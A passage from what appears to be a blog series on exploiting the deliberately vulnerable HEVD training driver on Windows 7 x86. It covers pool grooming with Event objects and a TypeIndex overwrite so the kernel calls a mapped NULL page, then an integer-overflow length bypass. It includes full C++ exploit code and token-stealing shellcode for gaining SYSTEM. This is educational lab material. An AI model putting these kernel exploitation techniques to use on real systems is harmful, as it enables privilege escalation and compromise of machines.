 8628a6c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a7c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a8c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a9c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628abc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628acc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628adc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628afc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

That looks pretty nice. We get a nice contiguous block of Event Objects just as we expected (bit weird that there’s a 0x80 byte hole in there…).

The next thing we need to do, is examine the constituent parts of these Event Objects to find our overwrite target. I like to take a look at the memory pane of and then, following along with the cited blogposts, parse out the meaning of the byte values. Here is the memory view for one of the Event Object allocations:

8628afc0 08 00 08 04 45 76 65 ee 00 00 00 00 40 00 00 00  ....Eve.....@...
8628afd0 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00  ................
8628afe0 00 00 00 00 0c 00 08 00 40 f9 37 86 00 00 00 00  [email protected].....
8628aff0 01 00 04 34 00 00 00 00 f8 af 28 86 f8 af 28 86

We can start parsing this by taking a look at the pool header:

kd> dt nt!_POOL_HEADER 8628afc0 
   +0x000 PreviousSize     : 0y000001000 (0x8)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080008
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

This looks pretty familiar to what we’ve done, obviously the PoolTag is different, but so is the Ulong1 value and you can examine the binary constituent parts that lead to its formulation. Next we’ll look at the OBJECT_HEADER_QUOTA_INFO which starts at offset 0x8 from the beginning of our allocation and you can match it up with the bytes in the memory view:

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8628afc0+0x8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null) 

So far, none of these things can be changed by our overwrite. Our overwrite has to keep all of this data intact so we’ll have to write these values into our input buffer. Next, we’ll finally start to approach our overwrite target when we parse out the OBJECT_HEADER:

kd> dt nt!_OBJECT_HEADER 8628afc0 + 8 + 10
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8637f940 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8637f940 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

This is where things start to get interesting as the TypeIndex value right now is set to 0xc. 0xc is actually an array index value, like array[0xc]. This array, is called the ObTypeIndexTable and it is filled with pointers which define OBJECT_TYPEs. This is actually really cool in my opinion because we can test this out. Let’s first dump all the pointers stored in the ObTypeIndexTable.

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
82997770  84f46598 84fedf48 84fede08 84fedd40
82997780  84fedc78 84fedbb0 84fedae8 84fed410
82997790  85053520 8504f9c8 8504f900 8504f838
829977a0  8503f9c8 8503f900 8503f838 84ffb9c8
829977b0  84ffb900 84ffb838 84fef780 84fef6b8
829977c0  84fef5f0 8503b838 8503b770 8503b6a8
829977d0  85057590 850573a0 84ff3ca0 84ff3bd8

If the first entry, 82997760, is array index 0, then 0xc index is going to be 85053520. Let’s get WinDBG to spill the beans on this type and let’s see if its indeed an Event Object.

kd> dt nt!_OBJECT_TYPE 85053520 -b
   +0x000 TypeList         : _LIST_ENTRY [ 0x85053520 - 0x85053520 ]
      +0x000 Flink            : 0x85053520 
      +0x004 Blink            : 0x85053520 
   +0x008 Name             : _UNICODE_STRING "Event"
      +0x000 Length           : 0xa
      +0x002 MaximumLength    : 0xc
      +0x004 Buffer           : 0x8ba06838  "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6bbf
   +0x01c TotalNumberOfHandles : 0x6c2b
   +0x020 HighWaterNumberOfObjects : 0x6bbf
   +0x024 HighWaterNumberOfHandles : 0x6c2b
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
      +0x000 Length           : 0x50
      +0x002 ObjectTypeFlags  : 0 ''
      +0x002 CaseInsensitive  : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned     : 0y0
      +0x004 ObjectTypeCode   : 2
      +0x008 InvalidAttributes : 0x100
      +0x00c GenericMapping   : _GENERIC_MAPPING
         +0x000 GenericRead      : 0x20001
         +0x004 GenericWrite     : 0x20002
         +0x008 GenericExecute   : 0x120000
         +0x00c GenericAll       : 0x1f0003
      +0x01c ValidAccessMask  : 0x1f0003
      +0x020 RetainAccess     : 0
      +0x024 PoolType         : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x40
      +0x030 DumpProcedure    : (null) 
      +0x034 OpenProcedure    : (null) 
      +0x038 CloseProcedure   : (null) 
      +0x03c DeleteProcedure  : (null) 
      +0x040 ParseProcedure   : (null) 
      +0x044 SecurityProcedure : 0x82abad90 
      +0x048 QueryNameProcedure : (null) 
      +0x04c OkayToCloseProcedure : (null) 
   +0x078 TypeLock         : _EX_PUSH_LOCK
      +0x000 Locked           : 0y0
      +0x000 Waiting          : 0y0
      +0x000 Waking           : 0y0
      +0x000 MultipleShared   : 0y0
      +0x000 Shared           : 0y0000000000000000000000000000 (0)
      +0x000 Value            : 0
      +0x000 Ptr              : (null) 
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x850535a0 - 0x850535a0 ]
      +0x000 Flink            : 0x850535a0 
      +0x004 Blink            : 0x850535a0 

Using -b option here really saves us because it displays all levels of sub-structures within their parent structures. So, we absolutely have honed in on the pointer to Event objects as evidenced by this:

+0x008 Name             : _UNICODE_STRING "Event"

What gets cool here, is that at offset 0x28 we see the TypeInfo structure. One of it’s members, the CloseProcedure is 0x38 deep into that TypeInfo structure. So starting from offset 0x0 of the data referenced by the OBJECT_TYPE pointer we found in the table, the CloseProcedure is located at offset 0x28 + 0x38, or 0x60. THIS is the function pointer that is called when use CloseHandle API to free these Event Objects from the non-paged pool. So this is our target.

If that is complicated I’ve tried to create a helpful diagram:

So what happens when we free the chunk with CloseHandle is the kernel goes to the address referenced by the array index value 0xc and looks at offset 0x60 from there for a function pointer and calls the function. Looking back at that table:

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
----SNIP----

The first function pointer is 0x00000000 and we already know from our NULL pointer dereference exploit that we can map the NULL page on Windows 7 x86. So thanks to the aforementioned bloggers, our path forward is clear. We’ll ONLY corrupt the value 0xc inside the OBJECT_HEADER so that it’s set to 0x0 instead. We’ll leave everything else the way it is with our overwrite. This way, when we free this chunk, the kernel will start looking for offset 0x60 for a function pointer from 0x00000000. So we’ll just map the NULL page and place a pointer to our shellcode at offset 0x60.

Executing The Plan

Now that we know our plan of attack, we need to execute it.

The adjustment we need to make is to poke holes in this contiguous block so that when we get our buffer allocated the allocator slides it right between Event Objects. We know that it takes 8 Event Objects being freed to make a 0x200-sized hole, so following along with @FuzzySec, we’ll release 8 Event Object handles every 0x16 handles in our vector. Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x200 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i = i + 0x16) {
        for (int x = 0; x < 8; x++) {
            BOOL freed = CloseHandle(sequential_handles[i + x]);
            if (freed == false) {
                cout << "[!] Unable to free sequential allocation!\n";
                cout << "[!] Last error: " << GetLastError() << "\n";
            }
        }
    }
    cout << "[>] Holes poked lol.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

After running it and looking up our post memcpy kernel buffer with the !pool command, we see that our 0x200 byte object was allocated precisely between two Event Objects! Everything is working as planned!

kd> !pool 862740c8
Pool page 862740c8 region is Nonpaged pool
 86274000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 86274040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274080 size:   40 previous size:   40  (Allocated)  Even (Protected)
*862740c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 862742c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862743c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862744c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862745c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274640 size:  200 previous size:   40  (Free)       Even
 86274840 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862748c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862749c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274bc0 size:  200 previous size:   40  (Free)       Even
 86274dc0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

Memory Corruption Engaged

Now that we can control the pool to a predictable degree, it’s time to overwrite that type index and change it from 0xc to 0x0. Everything else in between our 0x200 allocation and this byte need to remain the same or we’ll get a BSOD.

Let’s just use the dd command to dump 32 DWORD values from the beginning of the Event Objects right after our kernel buffer real quick. repaste in here the memory pane view of an Event Object, and you can see how I formulate the input buff in the exploit code.

kd> dd 8627e780 
8627e780  04080040 ee657645 00000000 00000040
8627e790  00000000 00000000 00000001 00000001
8627e7a0  00000000 0008000c 8637f940 00000000
----SNIP----

Right. So we need to keep everything but the starred 0xc intact and overwrite this single byte with 0x0. Looks like we’re overwriting 40 bytes in total or 0x28, which gives us an input buffer size of 0x220. We’ll make an overwrite_payload variable that is a byte buffer and well copy it into the last 0x28 bytes of a 0x220 sized buffer with our original \x42 values taking up the first 0x1F8 bytes as follows:

 ULONG payload_len = 0x220;

    BYTE* input_buff = (BYTE*)VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    BYTE overwrite_payload[] = (
        "\x40\x00\x08\x04"  // pool header
        "\x45\x76\x65\xee"  // pool tag
        "\x00\x00\x00\x00"  // obj header quota begin
        "\x40\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x00\x00"  // obj header quota end
        "\x01\x00\x00\x00"  // obj header begin
        "\x01\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x08\x00" // 0xc converted to 0x0
        );

    memset(input_buff, '\x42', 0x1F8);
    memcpy(input_buff + 0x1F8, overwrite_payload, 0x28)

We’ll also want to allocate the NULL page which I pulled directly from tekwizzz123.

void allocate_shellcode() {

    _NtAllocateVirtualMemory NtAllocateVirtualMemory = 
        (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateVirtualMemory");

    INT64 address = 0x1;
    int size = 0x100;

    HANDLE result = (HANDLE)NtAllocateVirtualMemory(
        GetCurrentProcess(),
        (PVOID*)&address,
        NULL,
        (PSIZE_T)&size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (result == INVALID_HANDLE_VALUE) {
        cout << "[!] Unable to allocate NULL page...wtf?\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] NULL page mapped.\n";
    cout << "[>] Putting 'AAAA' on NULL page...\n";

    memset((void*)0x0, '\x41', 0x100);

}

I’ll also fill the NULL page with pure \x41 values so that we should run this code and get an Access Violation exception with an eip value of 41414141.

Last but not least, we have to free our chunks so that the CloseProcedure is activated!

void free_chunks() {

    cout << "[>] Freeing defragmentation allocations...\n";
    for (int i = 0; i < defragment_handles.size(); i++) {

        BOOL freed = CloseHandle(defragment_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Defragmentation allocations freed.\n";
    cout << "[>] Freeing sequential allocations...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {

        BOOL freed = CloseHandle(sequential_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Sequential allocations freed.\n";
}

We run this code and what happens??

Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

We did it!!

You can examine the pool allocations too. Look at pool allocation right after our kernel buffer. We’ve replaced 0xc with 0x0 and you can see how it differs from the next Event Object as I’ve marked them with asteriks.

855b8af8 42 42 42 42 42 42 42 42 40 00 08 04 45 76 65 ee  [email protected].
855b8b08 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b18 01 00 00 00 01 00 00 00 00 00 00 00 *00* 00 08 00  ................
855b8b28 80 82 14 85 00 00 00 00 01 00 04 00 00 00 00 00  ................
855b8b38 38 8b 5b 85 38 8b 5b 85 08 00 08 04 45 76 65 ee  8.[.8.[.....Eve.
855b8b48 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b58 01 00 00 00 01 00 00 00 00 00 00 00 *0c* 00 08 00  ................

Now let’s just allocate some shellcode there…

Shellcode Implementation

We’re going to first use our shellcode from our Uninit Stack Variable exploit and see how far that gets us:

char Shellcode[] = (
		"\x60"
		"\x64\xA1\x24\x01\x00\x00"
		"\x8B\x40\x50"
		"\x89\xC1"
		"\x8B\x98\xF8\x00\x00\x00"
		"\xBA\x04\x00\x00\x00"
		"\x8B\x80\xB8\x00\x00\x00"
		"\x2D\xB8\x00\x00\x00"
		"\x39\x90\xB4\x00\x00\x00"
		"\x75\xED"
		"\x8B\x90\xF8\x00\x00\x00"
		"\x89\x91\xF8\x00\x00\x00"
		"\x61"
		"\xC3"
		);

These are my breakpoints right now:

kd> bp !HEVD+4D64
kd> ba r1 0x60
kd> bl
 0 e 8c295d64     0001 (0001) HEVD!TriggerNonPagedPoolOverflow+0xe6
 1 e 00000060 r 1 0001 (0001) 

Here is the disassembly pane after we hit our access breakpoint a few times (remember that that address will be accessed multiple times during our exploit). You can see we’re calling a function located at edi + 0x60 when edi is set to 0. So, this is our shellcode we’re about to run:

Here is the call stack:

We can see in the memory pane that we’re pushing 4 DWORDs onto the stack setting up our call to dword ptr [esp+0x60] which we would need to clean up in our subroutine (shellcode). So our shellcode will end with a ret 0x10 instruction to compensate.

Getting an nt authority/system shell »>

Full exploit code: here

Conclusion

That was a really fun one. Thanks again to the aforementioned authors and exploit writers. Even though this exploit vector involved some relatively old techniques, it was still fun for me and I learned a lot just about memory management in general and got some more experience in WinDBG. Until next time!

HEVD Exploits – Windows 7 x86 Integer Overflow

By: h0mbre
20 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

Thanks to @tekwizz123, I used his method of setting up the exploit buffer for the most part as the Windows macros I was using weren’t working (obviously user error.)

Integer Overflow

This was a really interesting bug to me. Generically, the bug is when you have some arithmetic in your code that allows for unintended behavior. The bug in question here involved incrementing a DWORD value that was set 0xFFFFFFFF which overflows the integer size and wraps the value around back to 0x00000000. If you add 0x4 to 0xFFFFFFFF, you get 0x100000003. However, this value is now over 8 bytes in length, so we lose the leading 1 and we’re back down to 0x00000003. Here is a small demo program:

#include <iostream>
#include <Windows.h>

int main() {

	DWORD var1 = 0xFFFFFFFF;
	DWORD var2 = var1 + 0x4;

	std::cout << ">> Variable One is: " << std::hex << var1 << "\n";
	std::cout << ">> Variable Two is: " << std::hex << var2 << "\n";
}

Here is the output:

>> Variable One is: ffffffff
>> Variable Two is: 3

I actually learned about this concept from Gynvael Coldwind’s stream on fuzzing. I also found the bug in my own code for an exploit on a real vulnerability I will hopefully be doing a write-up for soon (when the CVE gets published.) Now that we know how the bug occurs, let’s go find the bug in the driver in IDA and figure out how we can take advantage.

Reversing the Function

With the benefit of the comments I made in IDA, we can kind of see how this works. I’ve annotated where everything is after stepping through in WinDBG.

The first thing we notice here is that ebx gets loaded with the length of our input buffer in DeviceIoControl when we do this operation here: move ebx, [ebp+Size]. This is kind of obvious, but I hadn’t really given it much thought before. We allocate an input buffer in our code, usually its a character or byte array, and then we usually satisfy the DWORD nInBufferSize parameter by doing something like sizeof(input_buffer) or sizeof(input_buffer) - 1 because we actually want it to be accurate. Later, we might actually lie a little bit here.

Now that ebx is the length of our input buffer, we see that it gets +4 added to it and then loaded into to eax. If we had an input buffer of 0x7FC, adding 0x4 to it would make it 0x800. A really important thing to note here is that we’ve essentially created a new length variable in eax and kept our old one in ebx intact. In this case, eax would be 0x800 and ebx would still hold 0x7FC.

Next, eax is compared to esi which we can see holds 0x800. If the eax is equal to or more than 0x800, we can see that take the red path down to the Invalid UserBuffer Size debug message. We don’t want that. We need to satisfy this jbe condition.

If we satisfy the jbe condition, we branch down to loc_149A5. We put our buffer length from ebx into eax and then we effectively divide it by 4 since we do a bit shift right of 2. We compare this to quotient to edi which was zeroed out previously and has remained up until now unchanged. If length/4 quotient is the same or more than the counter, we move to loc_149F1 where we will end up exiting the function soon after. Right now, since our length is more than edi, we’ll jump to mov eax, [ebp+8].

This series of operations is actually the interesting part. eax is given a pointer to our input buffer and we compare the value there with 0BAD0B0B0. If they are the same value, we move towards exiting the function. So, so far we have identified two conditions where we’ll exit the function: if edi is ever equal to or more than the length of our input buffer divided by 4 OR if the 4 byte value located at [ebp+8] is equal to 0BAD0B0B0.

Let’s move on to the final puzzle piece. mov [ebp+edi*4+KernelBuffer], eax is kind of convoluted looking but what it’s doing is placing the 4 byte value in eax into the kernel buffer at index edi * 0x4. Right now, edi is 0, so it’s placing the 4 byte value right at the beginning of the kernel buffer. After this, the dword ptr value at ebp+8 is incremented by 0x4. This is interesting because we already know that ebp+0x8 is where the pointer is to our input buffer. So now that we’ve placed the first four bytes from our input buffer into the kernel buffer, we move now to the next 4 bytes. We see also that edi incremented and we now understand what is taking place.

As long as:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0,

we will copy 4 bytes of our input buffer into the kernel buffer and then move onto the next 4 bytes in the input buffer to test criteria 2 and 3 again.

There can’t really be a problem with copying bytes from the user buffer into the kernel buffer unless somehow the copying exceeds the space allocated in the kernel buffer. If that occurs, we’ll begin overwriting adjacent memory with our user buffer. How can we fool this length + 0x4 check?

Manipulating DWORD nInBufferSize

First we’ll send a vanilla payload to test our theories up to this point. Let’s start by sending a buffer full of all \x41 chars and it will be a length of 0x750 (null-terminated). We’ll use the sizeof() - 1 method to form our nInBufferSize parameter and account for the null terminator as well so that everything is accurate and consistent. Our code will look like this at this point:

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    

    BYTE input_buff[0x751] = { 0 };

    // 'A' * 1871
    memset(
        input_buff,
        '\x41',
        0x750);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) - 1  << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        sizeof(input_buff) - 1,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);
}

What are our predictions for this code? What conditions will we hit? The criteria for copying bytes from user buffer to kernel buffer was:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0

We should pass the first check since our buffer is indeed small enough. This second check will eventually make us exit the function since our length divided by 4, will eventually be caught by the Counter as it increments every 4 byte copy. We don’t have to worry about the third check as we don’t have this string in our payload. Let’s send it and step through it in WinDBG.

This picture helps us a lot. I’ve set a breakpoint on the comparison between the length of our buffer + 4 and 0x800. As you can see, eax holds 0x754 which is what we would expect since we sent a 0x750 byte buffer.

In the bottom right, we our user buffer was allocated at 0x0012f184. Let’s set a break on access at 0x0012f8d0 since that is 0x74c away from where we are now, which is 0x4 short of 0x750. If this 4 byte address is accessed for a read-operation we should hit our breakpoint. This will occur when the program goes to copy the 4 byte value here to the kernel buffer.

The syntax is ba r1 0x0012f8d0 which means “break on access if there is a read of at least 1 byte at that address.”

We resume from here, we hit our breakpoint.

Take a look at edi, we can see our counter has incremented 0x1d3 times at this point, which is very close to the length of our buffer (0x750) divided by 0x4 (0x1d4). We can see that right now, we’re doing a comparison on the 4 byte value at this address to ecx or bad0b0b0. We won’t hit that criteria but on the next iteration, our counter will be == to 0x1d4 and thus, we will be finished copying bytes into the kernel buffer. Everything worked as expected. Now let’s send a fake DWORD nInBufferSize value of 0xFFFFFFFF and watch us sail right through length check and see what else we bypass.

Our DeviceIoControl call now looks like this:

int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

When we hit a breakpoint at the point where we see eax being loaded with our user buffer length + 0x4, we see that right before the arithmetic, we are at a length of 0xffffffff in ebx.

Then after the operation, we see eax rolls over to 0x3.

So we will pass the length check now for sure, which we saw coming, the other really interesting thing that we took note of previously but can see playing out here is that ebx has been left undisturbed and is at 0xffffffff still. This is the register used in the arithmetic to determine whether or not the Counter should keep iterating or not. This value is eventually loaded into eax and divided by 4!. 0xfffffffff divided by 4 will likely never cause us to exit the function. We will keep copying bytes from the user buffer to the kernel buffer basically forever now.

THIS IS NOT GOOD

Overwriting arbitrary memory in the kernel space is dangerous business. We can’t corrupt anything more than we absolutely have to. We need a way to terminate the copying function. In comes the terminator string of 0BAD0B0B0 to the rescue. If the 4 byte value in the user buffer is 0BAD0B0B0, we cease copying and exit the function. Obviously we BSOD here.

